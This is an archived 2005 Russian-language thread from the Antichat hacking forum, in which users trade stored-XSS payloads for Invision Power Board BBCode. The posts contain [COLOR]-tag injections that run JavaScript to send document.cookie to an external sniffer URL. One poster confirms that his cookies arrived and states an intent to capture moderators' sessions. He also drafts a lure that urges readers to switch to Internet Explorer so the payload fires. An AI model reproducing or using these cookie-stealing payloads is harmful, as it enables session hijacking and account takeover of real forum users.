ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.02.2005, 02:53
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

что то не выходит=(
а если для маскировочки я напишу так:
1)круто[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color]
2)круто` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
это будет работать?Или (1) или (2)?

З.Ы.мне зайти на...?
 
Ответить с цитированием

  #12  
Старый 17.02.2005, 03:06
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

нет не тебе. Util.

1-й работает.
Ты что то не правильно делаешь.

На снифер
Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]
На алёрт.

Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]
Фонт менять у меня не получается как вот тут и не кто помогать кроме UTIL не хочит. Все здохли чтоли?

http://antichat.ru/txt/IPB/index1.php
 
Ответить с цитированием

  #13  
Старый 17.02.2005, 03:10
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

а как понять на алерт?Что это даёт?
 
Ответить с цитированием

  #14  
Старый 17.02.2005, 03:21
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Это ты сам должен посмотреть. Трудно тебе объяснить.

Вот иди ко мне там пробуй и тесты проводи.

http://www.whitejordan.ipbfree.com/

Я White Jordan.

Мне тут просто баннули ник.

Последний раз редактировалось ExpertLamer; 17.02.2005 в 03:23..
 
Ответить с цитированием

  #15  
Старый 17.02.2005, 03:22
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

похоже заработало частично,по крайней мере мой ИП и куки отображаются на сниффере, но нету реферера.Придётся завтра с утра пораньше отлавливать модеров=).Или что то опять неправильно?
А что попробовать?Алерт тебе запостить?

Последний раз редактировалось FRTD; 17.02.2005 в 03:24..
 
Ответить с цитированием

  #16  
Старый 17.02.2005, 03:26
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

да нет вродебы правельно.

А вдруг у них не Интернет Эксплорер?
 
Ответить с цитированием

  #17  
Старый 17.02.2005, 03:29
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

а чё если у них не Эксплорер то сё накрылось?=(
 
Ответить с цитированием

  #18  
Старый 17.02.2005, 03:33
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Не, если у них ИЭ то БУДИТ работать, а если нет, то код будит видным и тебя поймают и 3 кода лишенния свободы.....................
 
Ответить с цитированием

  #19  
Старый 17.02.2005, 03:38
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

да то что код виден хер с ним.Главное чтобы куки отправились на снифф.Куки придут?
 
Ответить с цитированием

  #20  
Старый 17.02.2005, 03:44
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

А если я после кода пропишу что нить то он будет работать?

Становиться ещё интереснее!!!Хотел щас дописать приписку" [color=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color] если у вас не отображается картинка,зайдите через Internet Explorer"(для очень доверчивых),а мне выдают:"незя использовать такой тег".Это по идее заплатка.Но почему она меня пропустила первый раз?

Последний раз редактировалось FRTD; 17.02.2005 в 03:49..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ